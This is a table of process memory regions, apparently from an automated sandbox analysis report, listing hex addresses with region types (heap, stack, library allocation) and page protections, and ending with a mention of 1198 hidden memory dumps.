|
page read and write
|
||
176F383C000
|
heap
|
page read and write
|
||
38803FC000
|
stack
|
page read and write
|
||
1A867D49000
|
trusted library allocation
|
page read and write
|
||
176802CC000
|
trusted library allocation
|
page read and write
|
||
2B3101EC000
|
trusted library allocation
|
page read and write
|
||
1FAE2144000
|
trusted library allocation
|
page read and write
|
||
1FAE209C000
|
trusted library allocation
|
page read and write
|
||
24569470000
|
heap
|
page read and write
|
||
1FAE1D9D000
|
trusted library allocation
|
page read and write
|
||
2B328878000
|
heap
|
page read and write
|
||
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
2B328B2E000
|
heap
|
page read and write
|
||
7FFD9BA40000
|
trusted library allocation
|
page execute and read and write
|
||
2B31032D000
|
trusted library allocation
|
page read and write
|
||
176F35F8000
|
heap
|
page read and write
|
||
2B32878A000
|
heap
|
page read and write
|
||
7FFD9B7DC000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B78D000
|
trusted library allocation
|
page execute and read and write
|
||
176F3935000
|
heap
|
page read and write
|
||
1FAE222A000
|
trusted library allocation
|
page read and write
|
||
1A867E62000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9AB000
|
trusted library allocation
|
page read and write
|
||
1FAE2216000
|
trusted library allocation
|
page read and write
|
||
1FAE211A000
|
trusted library allocation
|
page read and write
|
||
7FFD9B7DC000
|
trusted library allocation
|
page execute and read and write
|
||
1A867E31000
|
trusted library allocation
|
page read and write
|
||
176F3680000
|
heap
|
page read and write
|
||
2B3104B9000
|
trusted library allocation
|
page read and write
|
||
2B310493000
|
trusted library allocation
|
page read and write
|
||
176800F7000
|
trusted library allocation
|
page read and write
|
||
1FAE1EBC000
|
trusted library allocation
|
page read and write
|
||
1FAE2136000
|
trusted library allocation
|
page read and write
|
||
2B328C24000
|
heap
|
page read and write
|
||
1A867D42000
|
trusted library allocation
|
page read and write
|
||
1A867D4C000
|
trusted library allocation
|
page read and write
|
||
176F358A000
|
heap
|
page read and write
|
||
20B1EE21000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
176F387E000
|
heap
|
page read and write
|
||
24500089000
|
trusted library allocation
|
page read and write
|
||
2B30E270000
|
heap
|
page read and write
|
||
1FAE2020000
|
trusted library allocation
|
page read and write
|
||
2B3100A4000
|
trusted library allocation
|
page read and write
|
||
7FFD9B784000
|
trusted library allocation
|
page read and write
|
||
2B30E480000
|
heap
|
page read and write
|
||
7FFD9B7DC000
|
trusted library allocation
|
page execute and read and write
|
||
D371777000
|
stack
|
page read and write
|
||
7FFD9B783000
|
trusted library allocation
|
page execute and read and write
|
||
2B310312000
|
trusted library allocation
|
page read and write
|
||
1FAE1D96000
|
trusted library allocation
|
page read and write
|
||
7FFD9B7A4000
|
trusted library allocation
|
page read and write
|
||
245011AF000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9C1000
|
trusted library allocation
|
page read and write
|
||
7FFD9B930000
|
trusted library allocation
|
page read and write
|
||
7FFD9B7A4000
|
trusted library allocation
|
page read and write
|
||
2B3287AC000
|
heap
|
page read and write
|
||
2B3288D8000
|
heap
|
page read and write
|
||
1FAE0030000
|
heap
|
page read and write
|
||
D371938000
|
stack
|
page read and write
|
||
1FAF224F000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
2B310442000
|
trusted library allocation
|
page read and write
|
||
7FFD9B792000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAD4000
|
trusted library allocation
|
page read and write
|
||
7FFD9B900000
|
trusted library allocation
|
page read and write
|
||
7FFD9B970000
|
trusted library allocation
|
page execute and read and write
|
||
2B32886F000
|
heap
|
page read and write
|
||
2B3288DE000
|
heap
|
page read and write
|
||
1FAE1D18000
|
trusted library allocation
|
page read and write
|
||
4EC63FE000
|
stack
|
page read and write
|
||
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
1FAF21A6000
|
trusted library allocation
|
page read and write
|
||
1768052E000
|
trusted library allocation
|
page read and write
|
||
1FAF1E58000
|
trusted library allocation
|
page read and write
|
||
1FAE218A000
|
trusted library allocation
|
page read and write
|
||
7FFD9B920000
|
trusted library allocation
|
page read and write
|
||
20B0D610000
|
heap
|
page read and write
|
||
1A867EA1000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
20B0D268000
|
heap
|
page read and write
|
||
1A867E72000
|
trusted library allocation
|
page read and write
|
||
7FFD9B782000
|
trusted library allocation
|
page read and write
|
||
7FFD9B920000
|
trusted library allocation
|
page read and write
|
||
2B328934000
|
heap
|
page read and write
|
||
1FAF1EAD000
|
trusted library allocation
|
page read and write
|
||
2B32045F000
|
trusted library allocation
|
page read and write
|
||
2B30FF8D000
|
trusted library allocation
|
page read and write
|
||
1FAE1D42000
|
trusted library allocation
|
page read and write
|
||
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
2B3102DD000
|
trusted library allocation
|
page read and write
|
||
2B32881C000
|
heap
|
page read and write
|
||
2B328A66000
|
heap
|
page read and write
|
||
20B0D299000
|
heap
|
page read and write
|
||
A7E81E1000
|
stack
|
page read and write
|
||
24568C60000
|
trusted library allocation
|
page read and write
|
||
2B320410000
|
trusted library allocation
|
page read and write
|
||
2B3100CE000
|
trusted library allocation
|
page read and write
|
||
D371CBB000
|
stack
|
page read and write
|
||
2B31047F000
|
trusted library allocation
|
page read and write
|
||
1FAE1D10000
|
trusted library allocation
|
page read and write
|
||
2B32893E000
|
heap
|
page read and write
|
||
176F3430000
|
heap
|
page read and write
|
||
A7E85FE000
|
stack
|
page read and write
|
||
17680256000
|
trusted library allocation
|
page read and write
|
||
7FFD9B950000
|
trusted library allocation
|
page execute and read and write
|
||
24568568000
|
heap
|
page read and write
|
||
176F1110000
|
heap
|
page read and write
|
||
176F2A30000
|
heap
|
page read and write
|
||
2B310067000
|
trusted library allocation
|
page read and write
|
||
20B1EFC4000
|
trusted library allocation
|
page read and write
|
||
1768061B000
|
trusted library allocation
|
page read and write
|
||
1FAFA320000
|
trusted library allocation
|
page read and write
|
||
7FFD9B83C000
|
trusted library allocation
|
page execute and read and write
|
||
1A86623B000
|
heap
|
page read and write
|
||
176F3797000
|
heap
|
page read and write
|
||
7FFD9B780000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAF0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B7A4000
|
trusted library allocation
|
page read and write
|
||
1FAF2076000
|
trusted library allocation
|
page read and write
|
||
7FFD9B830000
|
trusted library allocation
|
page read and write
|
||
7FFD9B826000
|
trusted library allocation
|
page read and write
|
||
7FFD9B830000
|
trusted library allocation
|
page execute and read and write
|
||
2B310293000
|
trusted library allocation
|
page read and write
|
||
1FADFEA2000
|
heap
|
page read and write
|
||
2B328A8B000
|
heap
|
page read and write
|
||
2B327EC0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B950000
|
trusted library allocation
|
page read and write
|
||
176805E8000
|
trusted library allocation
|
page read and write
|
||
7FFD9B836000
|
trusted library allocation
|
page read and write
|
||
7FFD9B7AD000
|
trusted library allocation
|
page execute and read and write
|
||
20B0D620000
|
trusted library allocation
|
page read and write
|
||
176F36DB000
|
heap
|
page read and write
|
||
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
176F3462000
|
heap
|
page read and write
|
||
7FFD9BB70000
|
trusted library allocation
|
page read and write
|
||
24568560000
|
heap
|
page read and write
|
||
7FFD9B763000
|
trusted library allocation
|
page execute and read and write
|
||
DE0F2FC000
|
stack
|
page read and write
|
||
1A877FF2000
|
trusted library allocation
|
page read and write
|
||
1FAE21FA000
|
trusted library allocation
|
page read and write
|
||
5665FFF000
|
stack
|
page read and write
|
||
24569643000
|
heap
|
page read and write
|
||
176F3701000
|
heap
|
page read and write
|
||
7FFD9B927000
|
trusted library allocation
|
page read and write
|
||
176F3859000
|
heap
|
page read and write
|
||
1FAE1E0D000
|
trusted library allocation
|
page read and write
|
||
2B328A76000
|
heap
|
page read and write
|
||
1A866220000
|
heap
|
page read and write
|
||
2B30E300000
|
heap
|
page read and write
|
||
2B3100F6000
|
trusted library allocation
|
page read and write
|
||
1A8660C0000
|
heap
|
page read and write
|
||
1FAF1C4F000
|
trusted library allocation
|
page read and write
|
||
D371A39000
|
stack
|
page read and write
|
||
176F385B000
|
heap
|
page read and write
|
||
56653FF000
|
stack
|
page read and write
|
||
2B328A34000
|
heap
|
page read and write
|
||
1FAE1FAF000
|
trusted library allocation
|
page read and write
|
||
7FFD9B960000
|
trusted library allocation
|
page read and write
|
||
7FFD9B774000
|
trusted library allocation
|
page read and write
|
||
2B3103EB000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAD9000
|
trusted library allocation
|
page read and write
|
||
24568C70000
|
heap
|
page readonly
|
||
176908BD000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAE0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
1FAFA3CB000
|
heap
|
page read and write
|
||
1A877DD6000
|
trusted library allocation
|
page read and write
|
||
2AE09055000
|
heap
|
page read and write
|
||
1FAFA47D000
|
heap
|
page read and write
|
||
20B0D335000
|
heap
|
page read and write
|
||
D371473000
|
stack
|
page read and write
|
||
7FFD9B9B1000
|
trusted library allocation
|
page read and write
|
||
1FAF2482000
|
trusted library allocation
|
page read and write
|
||
2B31049A000
|
trusted library allocation
|
page read and write
|
||
24501896000
|
trusted library allocation
|
page read and write
|
||
176F374D000
|
heap
|
page read and write
|
||
7FFD9BA22000
|
trusted library allocation
|
page read and write
|
||
2B3288F1000
|
heap
|
page read and write
|
||
2B30FF87000
|
trusted library allocation
|
page read and write
|
||
1FAE2254000
|
trusted library allocation
|
page read and write
|
||
1FAE1AE0000
|
heap
|
page execute and read and write
|
||
7FFD9B794000
|
trusted library allocation
|
page read and write
|
||
DDF25FE000
|
stack
|
page read and write
|
||
176F378E000
|
heap
|
page read and write
|
||
1FAE1D3B000
|
trusted library allocation
|
page read and write
|
||
1FAE1F77000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
245685A5000
|
heap
|
page read and write
|
||
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
2B320212000
|
trusted library allocation
|
page read and write
|
||
1FAFA686000
|
heap
|
page read and write
|
||
2B30FFA7000
|
trusted library allocation
|
page read and write
|
||
1FAE00D0000
|
trusted library allocation
|
page read and write
|
||
1FAE2063000
|
trusted library allocation
|
page read and write
|
||
2B30E500000
|
trusted library allocation
|
page read and write
|
||
2B328846000
|
heap
|
page read and write
|
||
17680242000
|
trusted library allocation
|
page read and write
|
||
1FAE1D81000
|
trusted library allocation
|
page read and write
|
||
2B310347000
|
trusted library allocation
|
page read and write
|
||
176F38BC000
|
heap
|
page read and write
|
||
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B960000
|
trusted library allocation
|
page read and write
|
||
4EC6BFE000
|
stack
|
page read and write
|
||
D37157E000
|
stack
|
page read and write
|
||
20B1F0CA000
|
trusted library allocation
|
page read and write
|
||
24568E80000
|
heap
|
page read and write
|
||
1FAE1EC3000
|
trusted library allocation
|
page read and write
|
||
176F348F000
|
heap
|
page read and write
|
||
7FFD9B930000
|
trusted library allocation
|
page read and write
|
||
176F38E6000
|
heap
|
page read and write
|
||
2B328217000
|
heap
|
page read and write
|
||
7FFD9B934000
|
trusted library allocation
|
page read and write
|
||
7FFD9B790000
|
trusted library allocation
|
page read and write
|
||
1A867D52000
|
trusted library allocation
|
page read and write
|
||
24569474000
|
heap
|
page read and write
|
||
D371ABE000
|
stack
|
page read and write
|
||
245004D0000
|
trusted library allocation
|
page read and write
|
||
1FAF1FAB000
|
trusted library allocation
|
page read and write
|
||
7FFD9B940000
|
trusted library allocation
|
page read and write
|
||
3880FFB000
|
stack
|
page read and write
|
||
7FFD9BB90000
|
trusted library allocation
|
page read and write
|
||
245696E7000
|
heap
|
page read and write
|
||
1FAFA6B6000
|
heap
|
page read and write
|
||
24568C40000
|
trusted library allocation
|
page read and write
|
||
1A867D31000
|
trusted library allocation
|
page read and write
|
||
2AE08655000
|
heap
|
page read and write
|
||
176F115E000
|
heap
|
page read and write
|
||
176F36B8000
|
heap
|
page read and write
|
||
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B78D000
|
trusted library allocation
|
page execute and read and write
|
||
2B3287C5000
|
heap
|
page read and write
|
||
176F0FF0000
|
heap
|
page read and write
|
||
245685A3000
|
heap
|
page read and write
|
||
20B0D29C000
|
heap
|
page read and write
|
||
2456962B000
|
heap
|
page read and write
|
||
245692E8000
|
heap
|
page read and write
|
||
2B30E590000
|
heap
|
page read and write
|
||
245102FA000
|
trusted library allocation
|
page read and write
|
||
1FAE1F60000
|
trusted library allocation
|
page read and write
|
||
2B32068F000
|
trusted library allocation
|
page read and write
|
||
2B3288D6000
|
heap
|
page read and write
|
||
176F34CA000
|
heap
|
page read and write
|
||
176F3941000
|
heap
|
page read and write
|
||
1A866245000
|
heap
|
page read and write
|
||
7FFD9B790000
|
trusted library allocation
|
page read and write
|
||
1A877FD2000
|
trusted library allocation
|
page read and write
|
||
1FAFA42C000
|
heap
|
page read and write
|
||
7FFD9B950000
|
trusted library allocation
|
page read and write
|
||
1A866330000
|
trusted library allocation
|
page read and write
|
||
176F35FA000
|
heap
|
page read and write
|
||
2AE09A55000
|
heap
|
page read and write
|
||
2AE04DC0000
|
heap
|
page read and write
|
||
20B1EEC6000
|
trusted library allocation
|
page read and write
|
||
24510001000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9C6000
|
trusted library allocation
|
page read and write
|
||
176F2B70000
|
heap
|
page read and write
|
||
2B32013A000
|
trusted library allocation
|
page read and write
|
||
4EC77FF000
|
stack
|
page read and write
|
||
24510073000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
1FAE1DAB000
|
trusted library allocation
|
page read and write
|
||
1FAE1E8B000
|
trusted library allocation
|
page read and write
|
||
1FAF2054000
|
trusted library allocation
|
page read and write
|
||
176F35E5000
|
heap
|
page read and write
|
||
20B0D805000
|
heap
|
page read and write
|
||
7FFD9B773000
|
trusted library allocation
|
page execute and read and write
|
||
176F38C1000
|
heap
|
page read and write
|
||
7FFD9B830000
|
trusted library allocation
|
page read and write
|
||
DE0EEFF000
|
stack
|
page read and write
|
||
2B30FFF6000
|
trusted library allocation
|
page read and write
|
||
176F350F000
|
heap
|
page read and write
|
||
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
1404FC000
|
remote allocation
|
page execute and read and write
|
||
1FAE1E29000
|
trusted library allocation
|
page read and write
|
||
176F3917000
|
heap
|
page read and write
|
||
2B328C58000
|
heap
|
page read and write
|
||
7FFD9B77D000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAD0000
|
trusted library allocation
|
page read and write
|
||
176F1150000
|
heap
|
page read and write
|
||
176F38E0000
|
heap
|
page read and write
|
There are 1198 hidden memdumps, click here to show them.